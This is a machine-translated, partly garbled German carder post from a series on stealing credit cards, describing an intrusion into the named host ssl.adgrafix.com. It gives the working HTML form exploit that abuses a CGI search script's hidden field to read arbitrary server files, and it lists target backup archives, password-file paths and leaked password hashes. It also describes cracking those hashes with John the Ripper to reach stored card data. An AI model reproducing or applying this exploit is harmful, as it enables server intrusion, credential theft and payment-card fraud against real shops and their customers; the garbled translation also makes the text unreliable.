Wir setzen unsere Reihe von Klassen Kreditkarten zu erhalten.
Ressourcen ssl.adgrafix.com ist eine Sammlung von Hunderten von kleinen amerikanischen Online - Shops.
Gehen Sie an diese Tatsache nicht.
Je mehr , dass ich auf diesem Server Buggy Suche Skript gefunden , dass Sie jede Datei auf dem Server mit Serverberechtigungen anzeigen können.
Über die Verwundbarkeit Details hier: http://www.lwb57.org/advisories/?adv=12
Aber mein Ziel war , einen besseren Zugang zu yuzersky hranilitsam Kreditkarten.
Incite die DCS - Server samopisnaya Basis, nach einer Weile sah ich , dass das Verzeichnis / users / offen zu sehen, gab es Ordner Benutzer erfordern natürlich Genehmigung.
Aber anders als das, legte er sofort mehrere Backup - Archive yuzerkih Ordner zum Download zur Verfügung:
http://ssl.adgrafix.com/users/cedarsinn-secure.tar
http://ssl.adgrafix.com/users/diamonds-secure.tar
http://ssl.adgrafix.com/users/heavymetal-secure.tar
usw.
Deren Inhalte wurden Kreditkarte gefunden, aber die größte .htaccess - Datei wurde zu finden , wie folgt:
AuthUserFile / opt / home2 / adgrafix / securedir / heavymetalpw AuthGroupFile / dev / null
"Data Retrieval System Secure" AuthName
AuthType Basic
<Limit GET POST>
benötigen Benutzer schwermetall
</ Limit>
Achtung zog sofort die Datei mit einem Passwort heavymetalpw, und was am wichtigsten ist , wurde es den Weg vor ihm aufgebaut.
Es blieb in der ausbeuten , diesen Weg zu fügen, und ich habe das Passwort des Benutzers:
<Form method = POST action = " http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi"> <B> <font face = " Arial, Helvetica"> <font size = -1> Suche Site: </ FONT> </ FONT> <br> </ B> <Input type = text name = " Begriffe" size = 20>
<Input type = hidden name = boolean value = "AND"> <Input type = hidden name = Fall value = "Unempfindlich"> <Input type = hidden name = Abbuchung von value = "no"> <Input type = hidden name = max value = " 50">
<Input type = hidden name = faqfile value = "/"> <Input type = hidden name = resultspage value = "/ opt / home2 / adgrafix / securedir / heavymetalpw"> <Input type = einreichen value = " Suchen!">
Sie rufen dieses Skript aus einer Domäne , die nicht mit Adgrafix registriert ist Content-type: text / html schwermetall : .vGqzyBep5EDE bcroman: 1b8HaV7PCqZc.
Außerdem hatte ich bereits eine Liste von Benutzern dieser Ressource, mit dem gleichen Skript erhalten,
das war gerade genug , um den Namen eines beliebigen vorhandenen Benutzer eingeben:
http://ssl.adgrafix.com/ssl_adgrafix_user_list.txt
Natürlich wäre es möglich , die Anmeldungen von Benutzern des Ordners / users / zu nehmen, aber wenn die Suchmaschine war sehr nett und gab mir sofort eine Liste von Benutzernamen, habe ich beschlossen , zu belasten nicht.
Zwei Stunden später sammelte ich alle Logins / Passwörter und fütterte ihn john'u, und in drei Tagen hatte ich schon den Zugriff auf die Hälfte yuzerkih Speicher Kredit.
Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!
|
Kommentare
Kommentar nicht vergessen , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit ihre Meinung nicht teilen, und die Anonymität des Internets, ändert sich nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.